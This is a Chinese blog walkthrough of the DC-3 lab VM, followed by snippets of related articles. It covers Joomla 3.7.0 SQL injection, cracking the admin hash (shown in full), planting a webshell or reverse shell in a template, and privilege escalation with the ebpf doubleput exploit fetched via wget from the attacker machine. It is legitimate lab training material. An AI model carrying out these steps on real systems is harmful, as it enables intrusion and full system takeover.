个人博客:点我

DC系列共9个靶场,本次来试玩一下DC-3,只有1个flag,下载地址

下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。

IP

kali : 192.168.31.17
win7 : 192.168.31.168
dc-3 : 192.168.31.241

渗透

传统艺能端口扫描

nmap -sV -A -p- 192.168.31.241

cmd为joomla的,且只开放了80端口,使用joomscan 再扫一下发现了具体版本为 3.7.0,发现后台地址为/administrator。

再使用御剑扫描一下没有发现更多有用的信息。
因为开放了80端口登上去看一下

作者告诉我们只有一个入口可以进入后台,只有一个flag,需要root权限才可以读取。再看一下后台登录,尝试弱密码登录失败,(burp爆破应该是可以的)。但因为是joomla的CMS而且版本为3.7,我们尝试搜索一下他的漏洞。

searchexploit joomla 3.7

使用第一个sql注入的漏洞,直接将这个php下载下来在本地搭建一下登上去,输入target即可爆出一些信息,包括后台登录账号和密码的hash。

将admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 写入pass.txt进行破解

john --show pass.txt

得到密码为snoopy,登录上去之后发现templates板块可以修改模板beez3(或者另外一个)的源码,先写入phpinfo然后找一下他的路径,在192.168.31.241/templates/beez3/下,然后直接将index.php反弹shell或者一句话木马。

连接上后登录用户是www-data。

提权

由于只有root可以看到flag,因此需要提权。先看下内核是否存在内核漏洞

lsb_release -a

内核为ubuntu 16.04,查询其漏洞,使用39772.txt,查看其文档说明。部分内容如下:

An exploit that puts all this together is in exploit.tar. Usage:

	user@host:~/ebpf_mapfd_doubleput$ ./compile.sh

	user@host:~/ebpf_mapfd_doubleput$ ./doubleput

	starting writev

	woohoo, got pointer reuse

	writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.

	suid file detected, launching rootshell...

	we have root privs now...

	root@host:~/ebpf_mapfd_doubleput# id

	uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

	This exploit was tested on a Ubuntu 16.04 Desktop system.

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

根据文档说明,需要将下载下来的39772.zip中的exploit中的所有文件传到目标靶机然后顺次执行compile.sh和doubleput即可。

python -m http.server 80		 #python3开启服务器

python -m SimpleHTTPServer 80    #python2开启服务器

#靶机

cd /tmp

wget http://192.168.31.168/compile.sh

wget http://192.168.31.168/doubleput.c

wget http://192.168.31.168/hello.c

wget http://192.168.31.168/suidhelper.c

chmod +x compile.sh

./compile.sh

./doubleput

whoami

最后在/root下找到the-flag.txt。

总结

整个渗透、提权过程完全是利用到了joomla 3.7 这个CMS的版本漏洞,提示我们使用开源的CMS一定要及时更新版本和做好防护。

内网渗透DC-3靶场通关的更多相关文章

  1. 内网渗透之vlunstack靶场

    前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...

  2. 【CTF】msf和impacket联合拿域控内网渗透-拿域控

    前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也 ...

  3. Linux内网渗透

    Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...

  4. 7.内网渗透之windows认证机制

    文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域 ...

  5. 利用MSF实现三层网络的一次内网渗透

    目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为  image/jpeg 上传大马之后发 ...

  6. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  7. 内网渗透 关于GPO

    网上有很多讲内网渗透的文章,但看来看去还是一老外的博客给力,博客地址:www.harmj0y.net/blog,看完就明白这里面的很多思路都非常好. 做内网时,有时会碰到目标的机器开防火墙,所有端口基 ...

  8. [原创]K8 Cscan 3.6大型内网渗透自定义扫描器

    前言:无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率漏洞时效性1-2天,扫描内网或外网需1 ...

  9. [原创]K8 cping 3.0大型内网渗透扫描工具

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  10. [源码]Python简易http服务器(内网渗透大文件传输含下载命令)

    Python简易http服务器源码 import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2 ...

随机推荐

  1. Panel添加边框颜色和边框粗细调整

    Panel控件添加边框颜色 C# WinForm窗体控件Panel修改边框颜色以及边框宽度方法 - JiYF - 博客园 (cnblogs.com) 1.新建一个用户控件的项目,如下: 2.添加一个P ...

  2. BUUCTF-[网鼎杯 2020 青龙组]AreUSerialz

    BUUCTF-[网鼎杯 2020 青龙组]AreUSerialz 看题 <?php include("flag.php"); highlight_file(__FILE__) ...

  3. Python学习笔记摘要(一)类型 字符串 函数 列表 深浅拷贝

    python中的对象和类型 在python中,认为系统中的每一个"东西"都是一个对象,在python中,"对象"有着特殊的意义,python中的对象有: 一个标 ...

  4. ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1122)

    只需执行 /Applications/Python\ 3.9/Install\ Certificates.command

  5. 云原生学习筑基 ~ 组网必备知识点 ~ DNS服务

    @ 目录 一.为啥写这篇文章? 二.DNS的作用 三.域 四.DNS工作原理 五.搭建DNS服务器 5.1.Bind 5.2.系统环境准备 5.3.安装 5.4.查看bind的相关文件 5.5.查看b ...

  6. 性能环境之docker操作指南4(全网最全)

    容器的常用操作 docker run -i -t  /bin/bash 使用image创建container并进入交互模式, login shell是/bin/bash 实例: $ docker ru ...

  7. 各种插值法的python实现

    一维插值 插值不同于拟合.插值函数经过样本点,拟合函数一般基于最小二乘法尽量靠近所有样本点穿过.常见插值方法有拉格朗日插值法.分段插值法.样条插值法. 拉格朗日插值多项式:当节点数n较大时,拉格朗日插 ...

  8. QT程序打包成多平台可执行文件

    一.简述 QT项目开发完成后,需要打包发布程序,在实际生产中不可能把源码发给别人,所以需要将源码打包正可执行文件或者安装程序. 二.设置应用图标 把 ico 文件放到源代码目录下,在QT项目中的'.p ...

  9. Spring Boot入门系列(二十六)超级简单!Spring Data JPA 的使用!

    之前介绍了Mybatis数据库ORM框架,也介绍了使用Spring Boot 的jdbcTemplate 操作数据库.其实Spring Boot 还有一个非常实用的数据操作框架:Spring Data ...

  10. HCNP Routing&Switching之路由控制、路由策略和IP-Prefix List

    前文我们了解了IS-IS路由聚合和认证相关话题,回顾请参考https://www.cnblogs.com/qiuhom-1874/p/15306645.html:今天我们来聊一聊路由控制技术中的路由策 ...